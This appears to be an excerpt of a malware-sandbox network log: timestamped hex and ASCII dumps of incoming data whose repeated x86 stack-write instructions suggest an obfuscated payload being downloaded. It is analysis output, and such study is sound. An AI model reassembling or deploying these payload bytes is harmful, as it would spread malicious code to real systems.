2022-05-16 08:29:53 UTC	4733	IN	Data Raw: f6 c6 85 1f 81 fd ff 58 c6 85 20 81 fd ff 1e c6 85 21 81 fd ff b3 c6 85 22 81 fd ff 30 c6 85 23 81 fd ff ac c6 85 24 81 fd ff cf c6 85 25 81 fd ff 75 c6 85 26 81 fd ff d3 c6 85 27 81 fd ff df c6 85 28 81 fd ff 16 c6 85 29 81 fd ff 2e c6 85 2a 81 fd ff 0d c6 85 2b 81 fd ff d7 c6 85 2c 81 fd ff ba c6 85 2d 81 fd ff 4c c6 85 2e 81 fd ff a5 c6 85 2f 81 fd ff ce c6 85 30 81 fd ff ce c6 85 31 81 fd ff 29 c6 85 32 81 fd ff be c6 85 33 81 fd ff 0e c6 85 34 81 fd ff ec c6 85 35 81 fd ff a1 c6 85 36 81 fd ff c0 c6 85 37 81 fd ff 37 c6 85 38 81 fd ff 31 c6 85 39 81 fd ff 7d c6 85 3a 81 fd ff b7 c6 85 3b 81 fd ff f8 c6 85 3c 81 fd ff af c6 85 3d 81 fd ff fd c6 85 3e 81 fd ff 26 c6 85 3f 81 fd ff df c6 85 40 81 fd ff 0d c6 85 41 81 fd ff 75 c6 85 42 81 fd ff ba c6 85 Data Ascii: X !"0#$%u&'().*+,-L./01)2345677819}:;<=>&?@AuB
2022-05-16 08:29:53 UTC	4749	IN	Data Raw: 8a fd ff fc c6 85 44 8a fd ff c0 c6 85 45 8a fd ff 41 c6 85 46 8a fd ff aa c6 85 47 8a fd ff 96 c6 85 48 8a fd ff fb c6 85 49 8a fd ff e8 c6 85 4a 8a fd ff 20 c6 85 4b 8a fd ff fb c6 85 4c 8a fd ff 35 c6 85 4d 8a fd ff af c6 85 4e 8a fd ff cc c6 85 4f 8a fd ff b1 c6 85 50 8a fd ff 45 c6 85 51 8a fd ff b1 c6 85 52 8a fd ff 4e c6 85 53 8a fd ff 0b c6 85 54 8a fd ff 35 c6 85 55 8a fd ff 85 c6 85 56 8a fd ff 29 c6 85 57 8a fd ff 0c c6 85 58 8a fd ff 82 c6 85 59 8a fd ff 1f c6 85 5a 8a fd ff f9 c6 85 5b 8a fd ff 0b c6 85 5c 8a fd ff a9 c6 85 5d 8a fd ff a9 c6 85 5e 8a fd ff 2f c6 85 5f 8a fd ff 32 c6 85 60 8a fd ff 8e c6 85 61 8a fd ff 49 c6 85 62 8a fd ff 29 c6 85 63 8a fd ff 12 c6 85 64 8a fd ff e4 c6 85 65 8a fd ff 23 c6 85 66 8a fd ff 94 c6 85 67 8a fd ff Data Ascii: DEAFGHIJ KL5MNOPEQRNST5UV)WXYZ[\]^/_2`aIb)cde#fg
2022-05-16 08:29:53 UTC	4765	IN	Data Raw: c6 85 68 93 fd ff 84 c6 85 69 93 fd ff bc c6 85 6a 93 fd ff 3a c6 85 6b 93 fd ff 7e c6 85 6c 93 fd ff 9b c6 85 6d 93 fd ff 1f c6 85 6e 93 fd ff d2 c6 85 6f 93 fd ff c8 c6 85 70 93 fd ff df c6 85 71 93 fd ff ac c6 85 72 93 fd ff a2 c6 85 73 93 fd ff e4 c6 85 74 93 fd ff 6b c6 85 75 93 fd ff 63 c6 85 76 93 fd ff 81 c6 85 77 93 fd ff 64 c6 85 78 93 fd ff 3b c6 85 79 93 fd ff 7e c6 85 7a 93 fd ff 56 c6 85 7b 93 fd ff c9 c6 85 7c 93 fd ff 20 c6 85 7d 93 fd ff d1 c6 85 7e 93 fd ff 79 c6 85 7f 93 fd ff 0d c6 85 80 93 fd ff 6e c6 85 81 93 fd ff 28 c6 85 82 93 fd ff 43 c6 85 83 93 fd ff b2 c6 85 84 93 fd ff 40 c6 85 85 93 fd ff 85 c6 85 86 93 fd ff c4 c6 85 87 93 fd ff 57 c6 85 88 93 fd ff 3c c6 85 89 93 fd ff f9 c6 85 8a 93 fd ff ed c6 85 8b 93 fd ff 76 c6 85 8c Data Ascii: hij:k~lmnopqrstkucvwdx;y~zV{\| }~yn(C@W<v
2022-05-16 08:29:53 UTC	4781	IN	Data Raw: fd ff b9 c6 85 8d 9c fd ff 82 c6 85 8e 9c fd ff a2 c6 85 8f 9c fd ff 8a c6 85 90 9c fd ff 4b c6 85 91 9c fd ff 20 c6 85 92 9c fd ff 2f c6 85 93 9c fd ff 4c c6 85 94 9c fd ff 5d c6 85 95 9c fd ff 3e c6 85 96 9c fd ff bf c6 85 97 9c fd ff 02 c6 85 98 9c fd ff 82 c6 85 99 9c fd ff 15 c6 85 9a 9c fd ff 5e c6 85 9b 9c fd ff c3 c6 85 9c 9c fd ff f1 c6 85 9d 9c fd ff 23 c6 85 9e 9c fd ff 4c c6 85 9f 9c fd ff f5 c6 85 a0 9c fd ff 76 c6 85 a1 9c fd ff a3 c6 85 a2 9c fd ff 8e c6 85 a3 9c fd ff 6b c6 85 a4 9c fd ff 68 c6 85 a5 9c fd ff c5 c6 85 a6 9c fd ff 07 c6 85 a7 9c fd ff 82 c6 85 a8 9c fd ff be c6 85 a9 9c fd ff 2a c6 85 aa 9c fd ff e8 c6 85 ab 9c fd ff 2f c6 85 ac 9c fd ff fa c6 85 ad 9c fd ff 8e c6 85 ae 9c fd ff 12 c6 85 af 9c fd ff 1b c6 85 b0 9c fd ff ac Data Ascii: K /L]>^#Lvkh*/
2022-05-16 08:29:53 UTC	4797	IN	Data Raw: 85 b1 a5 fd ff 6b c6 85 b2 a5 fd ff 2b c6 85 b3 a5 fd ff 20 c6 85 b4 a5 fd ff e3 c6 85 b5 a5 fd ff 24 c6 85 b6 a5 fd ff b9 c6 85 b7 a5 fd ff a5 c6 85 b8 a5 fd ff f1 c6 85 b9 a5 fd ff c5 c6 85 ba a5 fd ff 6c c6 85 bb a5 fd ff cd c6 85 bc a5 fd ff 40 c6 85 bd a5 fd ff a6 c6 85 be a5 fd ff 79 c6 85 bf a5 fd ff af c6 85 c0 a5 fd ff 83 c6 85 c1 a5 fd ff ae c6 85 c2 a5 fd ff cd c6 85 c3 a5 fd ff 85 c6 85 c4 a5 fd ff 93 c6 85 c5 a5 fd ff 64 c6 85 c6 a5 fd ff 1c c6 85 c7 a5 fd ff 2c c6 85 c8 a5 fd ff a6 c6 85 c9 a5 fd ff 79 c6 85 ca a5 fd ff ad c6 85 cb a5 fd ff bc c6 85 cc a5 fd ff ea c6 85 cd a5 fd ff 6f c6 85 ce a5 fd ff 32 c6 85 cf a5 fd ff 4d c6 85 d0 a5 fd ff ec c6 85 d1 a5 fd ff 03 c6 85 d2 a5 fd ff 8a c6 85 d3 a5 fd ff 01 c6 85 d4 a5 fd ff 2c c6 85 d5 a5 Data Ascii: k+ $l@yd,yo2M,
2022-05-16 08:29:53 UTC	4813	IN	Data Raw: ff df c6 85 d6 ae fd ff 34 c6 85 d7 ae fd ff be c6 85 d8 ae fd ff b3 c6 85 d9 ae fd ff e7 c6 85 da ae fd ff fb c6 85 db ae fd ff 01 c6 85 dc ae fd ff fb c6 85 dd ae fd ff 6c c6 85 de ae fd ff 6b c6 85 df ae fd ff 1e c6 85 e0 ae fd ff be c6 85 e1 ae fd ff 41 c6 85 e2 ae fd ff 18 c6 85 e3 ae fd ff a9 c6 85 e4 ae fd ff 1b c6 85 e5 ae fd ff f1 c6 85 e6 ae fd ff 3a c6 85 e7 ae fd ff f4 c6 85 e8 ae fd ff 39 c6 85 e9 ae fd ff 88 c6 85 ea ae fd ff 5d c6 85 eb ae fd ff cd c6 85 ec ae fd ff 43 c6 85 ed ae fd ff a7 c6 85 ee ae fd ff bc c6 85 ef ae fd ff 93 c6 85 f0 ae fd ff 20 c6 85 f1 ae fd ff 7e c6 85 f2 ae fd ff b8 c6 85 f3 ae fd ff 55 c6 85 f4 ae fd ff 83 c6 85 f5 ae fd ff ab c6 85 f6 ae fd ff c1 c6 85 f7 ae fd ff 68 c6 85 f8 ae fd ff 1c c6 85 f9 ae fd ff 45 c6 Data Ascii: 4lkA:9]C ~UhE
2022-05-16 08:29:53 UTC	4829	IN	Data Raw: fa b7 fd ff 95 c6 85 fb b7 fd ff 3e c6 85 fc b7 fd ff 8b c6 85 fd b7 fd ff cb c6 85 fe b7 fd ff 39 c6 85 ff b7 fd ff d0 c6 85 00 b8 fd ff de c6 85 01 b8 fd ff 42 c6 85 02 b8 fd ff 68 c6 85 03 b8 fd ff f8 c6 85 04 b8 fd ff 9f c6 85 05 b8 fd ff 97 c6 85 06 b8 fd ff 6b c6 85 07 b8 fd ff 0f c6 85 08 b8 fd ff 20 c6 85 09 b8 fd ff 9b c6 85 0a b8 fd ff ba c6 85 0b b8 fd ff e1 c6 85 0c b8 fd ff 38 c6 85 0d b8 fd ff 18 c6 85 0e b8 fd ff 30 c6 85 0f b8 fd ff d5 c6 85 10 b8 fd ff 1e c6 85 11 b8 fd ff 6f c6 85 12 b8 fd ff 7e c6 85 13 b8 fd ff 24 c6 85 14 b8 fd ff fa c6 85 15 b8 fd ff 06 c6 85 16 b8 fd ff 81 c6 85 17 b8 fd ff fb c6 85 18 b8 fd ff 9a c6 85 19 b8 fd ff 3f c6 85 1a b8 fd ff 68 c6 85 1b b8 fd ff c6 c6 85 1c b8 fd ff 6f c6 85 1d b8 fd ff 7e c6 85 1e b8 fd Data Ascii: >9Bhk 80o~$?ho~
2022-05-16 08:29:53 UTC	4845	IN	Data Raw: 01 c6 85 1f c1 fd ff 80 c6 85 20 c1 fd ff b6 c6 85 21 c1 fd ff 65 c6 85 22 c1 fd ff 4b c6 85 23 c1 fd ff 0c c6 85 24 c1 fd ff 71 c6 85 25 c1 fd ff d7 c6 85 26 c1 fd ff 66 c6 85 27 c1 fd ff b8 c6 85 28 c1 fd ff 49 c6 85 29 c1 fd ff 4a c6 85 2a c1 fd ff 85 c6 85 2b c1 fd ff ca c6 85 2c c1 fd ff 4f c6 85 2d c1 fd ff ab c6 85 2e c1 fd ff 90 c6 85 2f c1 fd ff 39 c6 85 30 c1 fd ff 45 c6 85 31 c1 fd ff e8 c6 85 32 c1 fd ff 23 c6 85 33 c1 fd ff 08 c6 85 34 c1 fd ff 94 c6 85 35 c1 fd ff 9e c6 85 36 c1 fd ff 28 c6 85 37 c1 fd ff f8 c6 85 38 c1 fd ff 23 c6 85 39 c1 fd ff 31 c6 85 3a c1 fd ff 7d c6 85 3b c1 fd ff 65 c6 85 3c c1 fd ff 46 c6 85 3d c1 fd ff 2b c6 85 3e c1 fd ff 8e c6 85 3f c1 fd ff df c6 85 40 c1 fd ff 9e c6 85 41 c1 fd ff d7 c6 85 42 c1 fd ff 2a c6 85 Data Ascii: !e"K#$q%&f'(I)J+,O-./90E12#3456(78#91:};e<F=+>?@AB
2022-05-16 08:29:53 UTC	4861	IN	Data Raw: ca fd ff 63 c6 85 44 ca fd ff b8 c6 85 45 ca fd ff e4 c6 85 46 ca fd ff c7 c6 85 47 ca fd ff 75 c6 85 48 ca fd ff d1 c6 85 49 ca fd ff df c6 85 4a ca fd ff 16 c6 85 4b ca fd ff 2e c6 85 4c ca fd ff ca c6 85 4d ca fd ff 10 c6 85 4e ca fd ff 12 c6 85 4f ca fd ff 44 c6 85 50 ca fd ff 7c c6 85 51 ca fd ff 87 c6 85 52 ca fd ff de c6 85 53 ca fd ff 61 c6 85 54 ca fd ff 79 c6 85 55 ca fd ff c1 c6 85 56 ca fd ff 4c c6 85 57 ca fd ff a5 c6 85 58 ca fd ff 97 c6 85 59 ca fd ff 80 c6 85 5a ca fd ff b1 c6 85 5b ca fd ff e5 c6 85 5c ca fd ff 3c c6 85 5d ca fd ff 6c c6 85 5e ca fd ff 8b c6 85 5f ca fd ff 48 c6 85 60 ca fd ff e7 c6 85 61 ca fd ff ab c6 85 62 ca fd ff 55 c6 85 63 ca fd ff b6 c6 85 64 ca fd ff bd c6 85 65 ca fd ff 39 c6 85 66 ca fd ff 00 c6 85 67 ca fd ff Data Ascii: cDEFGuHIJK.LMNODP\|QRSaTyUVLWXYZ[\<]l^_H`abUcde9fg
2022-05-16 08:29:53 UTC	4877	IN	Data Raw: c6 85 68 d3 fd ff c7 c6 85 69 d3 fd ff de c6 85 6a d3 fd ff 8d c6 85 6b d3 fd ff 1f c6 85 6c d3 fd ff 97 c6 85 6d d3 fd ff 8f c6 85 6e d3 fd ff 39 c6 85 6f d3 fd ff 06 c6 85 70 d3 fd ff c8 c6 85 71 d3 fd ff 16 c6 85 72 d3 fd ff 21 c6 85 73 d3 fd ff fd c6 85 74 d3 fd ff b1 c6 85 75 d3 fd ff 45 c6 85 76 d3 fd ff 59 c6 85 77 d3 fd ff 26 c6 85 78 d3 fd ff 25 c6 85 79 d3 fd ff a3 c6 85 7a d3 fd ff da c6 85 7b d3 fd ff 74 c6 85 7c d3 fd ff c1 c6 85 7d d3 fd ff 08 c6 85 7e d3 fd ff dc c6 85 7f d3 fd ff 8d c6 85 80 d3 fd ff e2 c6 85 81 d3 fd ff 79 c6 85 82 d3 fd ff be c6 85 83 d3 fd ff 65 c6 85 84 d3 fd ff b6 c6 85 85 d3 fd ff 1e c6 85 86 d3 fd ff 4b c6 85 87 d3 fd ff 43 c6 85 88 d3 fd ff 53 c6 85 89 d3 fd ff 1c c6 85 8a d3 fd ff d0 c6 85 8b d3 fd ff 2f c6 85 8c Data Ascii: hijklmn9opqr!stuEvYw&x%yz{t\|}~yeKCS/
2022-05-16 08:29:53 UTC	4893	IN	Data Raw: fd ff 07 c6 85 8d dc fd ff 5e c6 85 8e dc fd ff d3 c6 85 8f dc fd ff 7d c6 85 90 dc fd ff 60 c6 85 91 dc fd ff f6 c6 85 92 dc fd ff 1f c6 85 93 dc fd ff 15 c6 85 94 dc fd ff 28 c6 85 95 dc fd ff a0 c6 85 96 dc fd ff 4f c6 85 97 dc fd ff 23 c6 85 98 dc fd ff 8d c6 85 99 dc fd ff 06 c6 85 9a dc fd ff bd c6 85 9b dc fd ff 8c c6 85 9c dc fd ff 36 c6 85 9d dc fd ff ad c6 85 9e dc fd ff 48 c6 85 9f dc fd ff d2 c6 85 a0 dc fd ff 79 c6 85 a1 dc fd ff 0d c6 85 a2 dc fd ff 1f c6 85 a3 dc fd ff 28 c6 85 a4 dc fd ff 43 c6 85 a5 dc fd ff f6 c6 85 a6 dc fd ff ed c6 85 a7 dc fd ff 20 c6 85 a8 dc fd ff 68 c6 85 a9 dc fd ff 9b c6 85 aa dc fd ff 18 c6 85 ab dc fd ff db c6 85 ac dc fd ff a5 c6 85 ad dc fd ff b3 c6 85 ae dc fd ff f2 c6 85 af dc fd ff 59 c6 85 b0 dc fd ff c1 Data Ascii: ^}`(O#6Hy(C hY
2022-05-16 08:29:53 UTC	4909	IN	Data Raw: 85 b1 e5 fd ff ea c6 85 b2 e5 fd ff eb c6 85 b3 e5 fd ff 72 c6 85 b4 e5 fd ff 45 c6 85 b5 e5 fd ff 95 c6 85 b6 e5 fd ff f2 c6 85 b7 e5 fd ff 3e c6 85 b8 e5 fd ff 1f c6 85 b9 e5 fd ff ca c6 85 ba e5 fd ff 82 c6 85 bb e5 fd ff 17 c6 85 bc e5 fd ff db c6 85 bd e5 fd ff af c6 85 be e5 fd ff 5a c6 85 bf e5 fd ff e7 c6 85 c0 e5 fd ff e3 c6 85 c1 e5 fd ff 41 c6 85 c2 e5 fd ff 52 c6 85 c3 e5 fd ff fb c6 85 c4 e5 fd ff 66 c6 85 c5 e5 fd ff af c6 85 c6 e5 fd ff 0f c6 85 c7 e5 fd ff 34 c6 85 c8 e5 fd ff b0 c6 85 c9 e5 fd ff 41 c6 85 ca e5 fd ff b9 c6 85 cb e5 fd ff 0e c6 85 cc e5 fd ff 58 c6 85 cd e5 fd ff a6 c6 85 ce e5 fd ff be c6 85 cf e5 fd ff aa c6 85 d0 e5 fd ff b3 c6 85 d1 e5 fd ff 12 c6 85 d2 e5 fd ff 2b c6 85 d3 e5 fd ff ac c6 85 d4 e5 fd ff 4b c6 85 d5 e5 Data Ascii: rE>ZARf4AX+K
2022-05-16 08:29:53 UTC	4925	IN	Data Raw: ff 20 c6 85 d6 ee fd ff e1 c6 85 d7 ee fd ff 39 c6 85 d8 ee fd ff dd c6 85 d9 ee fd ff fd c6 85 da ee fd ff 32 c6 85 db ee fd ff 0c c6 85 dc ee fd ff 68 c6 85 dd ee fd ff a1 c6 85 de ee fd ff 63 c6 85 df ee fd ff 2f c6 85 e0 ee fd ff b0 c6 85 e1 ee fd ff c8 c6 85 e2 ee fd ff 57 c6 85 e3 ee fd ff 8a c6 85 e4 ee fd ff ed c6 85 e5 ee fd ff cd c6 85 e6 ee fd ff d8 c6 85 e7 ee fd ff 27 c6 85 e8 ee fd ff d8 c6 85 e9 ee fd ff 83 c6 85 ea ee fd ff c7 c6 85 eb ee fd ff 31 c6 85 ec ee fd ff 24 c6 85 ed ee fd ff f8 c6 85 ee ee fd ff 26 c6 85 ef ee fd ff d2 c6 85 f0 ee fd ff 09 c6 85 f1 ee fd ff 38 c6 85 f2 ee fd ff 97 c6 85 f3 ee fd ff 6f c6 85 f4 ee fd ff b3 c6 85 f5 ee fd ff 45 c6 85 f6 ee fd ff 08 c6 85 f7 ee fd ff 55 c6 85 f8 ee fd ff e9 c6 85 f9 ee fd ff 45 c6 Data Ascii: 92hc/W'1$&8oEUE
2022-05-16 08:29:53 UTC	4941	IN	Data Raw: fa f7 fd ff 4e c6 85 fb f7 fd ff c2 c6 85 fc f7 fd ff 97 c6 85 fd f7 fd ff 80 c6 85 fe f7 fd ff e6 c6 85 ff f7 fd ff 45 c6 85 00 f8 fd ff f2 c6 85 01 f8 fd ff 9f c6 85 02 f8 fd ff 43 c6 85 03 f8 fd ff 82 c6 85 04 f8 fd ff 75 c6 85 05 f8 fd ff 8a c6 85 06 f8 fd ff c3 c6 85 07 f8 fd ff 1c c6 85 08 f8 fd ff 8e c6 85 09 f8 fd ff c2 c6 85 0a f8 fd ff 8e c6 85 0b f8 fd ff 8a c6 85 0c f8 fd ff d8 c6 85 0d f8 fd ff a1 c6 85 0e f8 fd ff e2 c6 85 0f f8 fd ff 68 c6 85 10 f8 fd ff cc c6 85 11 f8 fd ff 87 c6 85 12 f8 fd ff 48 c6 85 13 f8 fd ff bd c6 85 14 f8 fd ff b1 c6 85 15 f8 fd ff 3d c6 85 16 f8 fd ff 27 c6 85 17 f8 fd ff eb c6 85 18 f8 fd ff 29 c6 85 19 f8 fd ff 4b c6 85 1a f8 fd ff a4 c6 85 1b f8 fd ff 30 c6 85 1c f8 fd ff 98 c6 85 1d f8 fd ff 53 c6 85 1e f8 fd Data Ascii: NECuhH=')K0S
2022-05-16 08:29:53 UTC	4957	IN	Data Raw: 26 c6 85 1f 01 fe ff df c6 85 20 01 fe ff 96 c6 85 21 01 fe ff 6c c6 85 22 01 fe ff b2 c6 85 23 01 fe ff 73 c6 85 24 01 fe ff 74 c6 85 25 01 fe ff ae c6 85 26 01 fe ff e2 c6 85 27 01 fe ff ab c6 85 28 01 fe ff 38 c6 85 29 01 fe ff 3f c6 85 2a 01 fe ff a1 c6 85 2b 01 fe ff 31 c6 85 2c 01 fe ff 16 c6 85 2d 01 fe ff 7a c6 85 2e 01 fe ff c5 c6 85 2f 01 fe ff 21 c6 85 30 01 fe ff 8f c6 85 31 01 fe ff 70 c6 85 32 01 fe ff 5a c6 85 33 01 fe ff 4b c6 85 34 01 fe ff 52 c6 85 35 01 fe ff af c6 85 36 01 fe ff e6 c6 85 37 01 fe ff a9 c6 85 38 01 fe ff ed c6 85 39 01 fe ff 97 c6 85 3a 01 fe ff 41 c6 85 3b 01 fe ff b4 c6 85 3c 01 fe ff 0c c6 85 3d 01 fe ff e2 c6 85 3e 01 fe ff 87 c6 85 3f 01 fe ff a3 c6 85 40 01 fe ff e5 c6 85 41 01 fe ff 78 c6 85 42 01 fe ff 36 c6 85 Data Ascii: & !l"#s$t%&'(8)?*+1,-z./!01p2Z3K4R56789:A;<=>?@AxB6
2022-05-16 08:29:53 UTC	4973	IN	Data Raw: 0a fe ff a2 c6 85 44 0a fe ff 23 c6 85 45 0a fe ff 70 c6 85 46 0a fe ff 15 c6 85 47 0a fe ff 6f c6 85 48 0a fe ff 66 c6 85 49 0a fe ff e1 c6 85 4a 0a fe ff 9e c6 85 4b 0a fe ff 85 c6 85 4c 0a fe ff f5 c6 85 4d 0a fe ff ae c6 85 4e 0a fe ff 6f c6 85 4f 0a fe ff e3 c6 85 50 0a fe ff 1d c6 85 51 0a fe ff 75 c6 85 52 0a fe ff 29 c6 85 53 0a fe ff 6f c6 85 54 0a fe ff 8f c6 85 55 0a fe ff db c6 85 56 0a fe ff dd c6 85 57 0a fe ff 60 c6 85 58 0a fe ff d7 c6 85 59 0a fe ff 13 c6 85 5a 0a fe ff 3a c6 85 5b 0a fe ff 1d c6 85 5c 0a fe ff bf c6 85 5d 0a fe ff 09 c6 85 5e 0a fe ff fb c6 85 5f 0a fe ff 67 c6 85 60 0a fe ff aa c6 85 61 0a fe ff e7 c6 85 62 0a fe ff 76 c6 85 63 0a fe ff 86 c6 85 64 0a fe ff 33 c6 85 65 0a fe ff 55 c6 85 66 0a fe ff d8 c6 85 67 0a fe ff Data Ascii: D#EpFGoHfIJKLMNoOPQuR)SoTUVW`XYZ:[\]^_g`abvcd3eUfg
2022-05-16 08:29:53 UTC	4989	IN	Data Raw: c6 85 68 13 fe ff 87 c6 85 69 13 fe ff 75 c6 85 6a 13 fe ff d1 c6 85 6b 13 fe ff df c6 85 6c 13 fe ff 16 c6 85 6d 13 fe ff 5e c6 85 6e 13 fe ff 09 c6 85 6f 13 fe ff d7 c6 85 70 13 fe ff fe c6 85 71 13 fe ff 80 c6 85 72 13 fe ff 3f c6 85 73 13 fe ff 32 c6 85 74 13 fe ff 32 c6 85 75 13 fe ff d6 c6 85 76 13 fe ff ba c6 85 77 13 fe ff 0e c6 85 78 13 fe ff 2c c6 85 79 13 fe ff a1 c6 85 7a 13 fe ff c8 c6 85 7b 13 fe ff 7e c6 85 7c 13 fe ff ba c6 85 7d 13 fe ff 7d c6 85 7e 13 fe ff 74 c6 85 7f 13 fe ff e5 c6 85 80 13 fe ff cf c6 85 81 13 fe ff e9 c6 85 82 13 fe ff 07 c6 85 83 13 fe ff 97 c6 85 84 13 fe ff 86 c6 85 85 13 fe ff b2 c6 85 86 13 fe ff 12 c6 85 87 13 fe ff 2d c6 85 88 13 fe ff cc c6 85 89 13 fe ff 73 c6 85 8a 13 fe ff 81 c6 85 8b 13 fe ff 06 c6 85 8c Data Ascii: hiujklm^nopqr?s2t2uvwx,yz{~\|}}~t-s
2022-05-16 08:29:53 UTC	5005	IN	Data Raw: fe ff b1 c6 85 8d 1c fe ff 2c c6 85 8e 1c fe ff a4 c6 85 8f 1c fe ff bc c6 85 90 1c fe ff 39 c6 85 91 1c fe ff 02 c6 85 92 1c fe ff d0 c6 85 93 1c fe ff 16 c6 85 94 1c fe ff 75 c6 85 95 1c fe ff fd c6 85 96 1c fe ff bb c6 85 97 1c fe ff ed c6 85 98 1c fe ff b5 c6 85 99 1c fe ff 0e c6 85 9a 1c fe ff 6d c6 85 9b 1c fe ff 28 c6 85 9c 1c fe ff 9a c6 85 9d 1c fe ff 17 c6 85 9e 1c fe ff c4 c6 85 9f 1c fe ff 43 c6 85 a0 1c fe ff a0 c6 85 a1 1c fe ff 8c c6 85 a2 1c fe ff 67 c6 85 a3 1c fe ff f1 c6 85 a4 1c fe ff f9 c6 85 a5 1c fe ff a9 c6 85 a6 1c fe ff 39 c6 85 a7 1c fe ff d3 c6 85 a8 1c fe ff eb c6 85 a9 1c fe ff 47 c6 85 aa 1c fe ff 1c c6 85 ab 1c fe ff e3 c6 85 ac 1c fe ff 2f c6 85 ad 1c fe ff d0 c6 85 ae 1c fe ff f6 c6 85 af 1c fe ff e8 c6 85 b0 1c fe ff 49 Data Ascii: ,9um(Cg9G/I
2022-05-16 08:29:53 UTC	5021	IN	Data Raw: 85 b1 25 fe ff c6 c6 85 b2 25 fe ff d0 c6 85 b3 25 fe ff 48 c6 85 b4 25 fe ff 9b c6 85 b5 25 fe ff 88 c6 85 b6 25 fe ff 79 c6 85 b7 25 fe ff e8 c6 85 b8 25 fe ff c6 c6 85 b9 25 fe ff 67 c6 85 ba 25 fe ff 5a c6 85 bb 25 fe ff 84 c6 85 bc 25 fe ff fa c6 85 bd 25 fe ff b7 c6 85 be 25 fe ff f6 c6 85 bf 25 fe ff ad c6 85 c0 25 fe ff e8 c6 85 c1 25 fe ff 5a c6 85 c2 25 fe ff 3d c6 85 c3 25 fe ff 29 c6 85 c4 25 fe ff 76 c6 85 c5 25 fe ff ae c6 85 c6 25 fe ff b1 c6 85 c7 25 fe ff 96 c6 85 c8 25 fe ff e9 c6 85 c9 25 fe ff 4d c6 85 ca 25 fe ff 6d c6 85 cb 25 fe ff 93 c6 85 cc 25 fe ff 18 c6 85 cd 25 fe ff ad c6 85 ce 25 fe ff a1 c6 85 cf 25 fe ff b3 c6 85 d0 25 fe ff 3a c6 85 d1 25 fe ff 59 c6 85 d2 25 fe ff 19 c6 85 d3 25 fe ff 23 c6 85 d4 25 fe ff 2e c6 85 d5 25 Data Ascii: %%%H%%%y%%%g%Z%%%%%%%Z%=%)%v%%%%%M%m%%%%%%:%Y%%#%.%
2022-05-16 08:29:53 UTC	5037	IN	Data Raw: ff b5 c6 85 d6 2e fe ff 62 c6 85 d7 2e fe ff 68 c6 85 d8 2e fe ff 0d c6 85 d9 2e fe ff b1 c6 85 da 2e fe ff d0 c6 85 db 2e fe ff ee c6 85 dc 2e fe ff ea c6 85 dd 2e fe ff 91 c6 85 de 2e fe ff 9f c6 85 df 2e fe ff 8b c6 85 e0 2e fe ff 7a c6 85 e1 2e fe ff 68 c6 85 e2 2e fe ff 2c c6 85 e3 2e fe ff 29 c6 85 e4 2e fe ff 52 c6 85 e5 2e fe ff a3 c6 85 e6 2e fe ff 8e c6 85 e7 2e fe ff 68 c6 85 e8 2e fe ff 29 c6 85 e9 2e fe ff 81 c6 85 ea 2e fe ff c4 c6 85 eb 2e fe ff 8d c6 85 ec 2e fe ff 16 c6 85 ed 2e fe ff ae c6 85 ee 2e fe ff 10 c6 85 ef 2e fe ff 2f c6 85 f0 2e fe ff fa c6 85 f1 2e fe ff c6 c6 85 f2 2e fe ff 16 c6 85 f3 2e fe ff 56 c6 85 f4 2e fe ff 84 c6 85 f5 2e fe ff b0 c6 85 f6 2e fe ff e2 c6 85 f7 2e fe ff 4e c6 85 f8 2e fe ff 4a c6 85 f9 2e fe ff 1f c6 Data Ascii: .b.h.........z.h.,.).R...h.)......./....V....N.J.
2022-05-16 08:29:53 UTC	5053	IN	Data Raw: fa 37 fe ff bd c6 85 fb 37 fe ff c9 c6 85 fc 37 fe ff 22 c6 85 fd 37 fe ff 0c c6 85 fe 37 fe ff a0 c6 85 ff 37 fe ff a1 c6 85 00 38 fe ff 7b c6 85 01 38 fe ff 66 c6 85 02 38 fe ff 31 c6 85 03 38 fe ff 24 c6 85 04 38 fe ff 87 c6 85 05 38 fe ff 01 c6 85 06 38 fe ff 69 c6 85 07 38 fe ff e9 c6 85 08 38 fe ff 80 c6 85 09 38 fe ff aa c6 85 0a 38 fe ff 54 c6 85 0b 38 fe ff a7 c6 85 0c 38 fe ff ec c6 85 0d 38 fe ff b1 c6 85 0e 38 fe ff bc c6 85 0f 38 fe ff f8 c6 85 10 38 fe ff ce c6 85 11 38 fe ff 4f c6 85 12 38 fe ff f3 c6 85 13 38 fe ff 42 c6 85 14 38 fe ff 4c c6 85 15 38 fe ff 33 c6 85 16 38 fe ff 3b c6 85 17 38 fe ff 01 c6 85 18 38 fe ff 2c c6 85 19 38 fe ff 4e c6 85 1a 38 fe ff 61 c6 85 1b 38 fe ff a8 c6 85 1c 38 fe ff 35 c6 85 1d 38 fe ff 8d c6 85 1e 38 fe Data Ascii: 777"7778{8f818$888i8888T8888888O88B8L838;88,8N8a88588
2022-05-16 08:29:53 UTC	5069	IN	Data Raw: a7 c6 85 1f 41 fe ff d2 c6 85 20 41 fe ff ae c6 85 21 41 fe ff 60 c6 85 22 41 fe ff c4 c6 85 23 41 fe ff 7a c6 85 24 41 fe ff d2 c6 85 25 41 fe ff b2 c6 85 26 41 fe ff 1c c6 85 27 41 fe ff 06 c6 85 28 41 fe ff a7 c6 85 29 41 fe ff 9d c6 85 2a 41 fe ff 81 c6 85 2b 41 fe ff 3c c6 85 2c 41 fe ff 71 c6 85 2d 41 fe ff 03 c6 85 2e 41 fe ff d4 c6 85 2f 41 fe ff 0c c6 85 30 41 fe ff 42 c6 85 31 41 fe ff 63 c6 85 32 41 fe ff 9b c6 85 33 41 fe ff a3 c6 85 34 41 fe ff 68 c6 85 35 41 fe ff c6 c6 85 36 41 fe ff fc c6 85 37 41 fe ff 39 c6 85 38 41 fe ff 88 c6 85 39 41 fe ff 27 c6 85 3a 41 fe ff e5 c6 85 3b 41 fe ff 88 c6 85 3c 41 fe ff 51 c6 85 3d 41 fe ff ce c6 85 3e 41 fe ff 67 c6 85 3f 41 fe ff 53 c6 85 40 41 fe ff 5b c6 85 41 41 fe ff 96 c6 85 42 41 fe ff 84 c6 85 Data Ascii: A A!A`"A#Az$A%A&A'A(A)A*A+A<,Aq-A.A/A0AB1Ac2A3A4Ah5A6A7A98A9A':A;A<AQ=A>Ag?AS@A[AABA
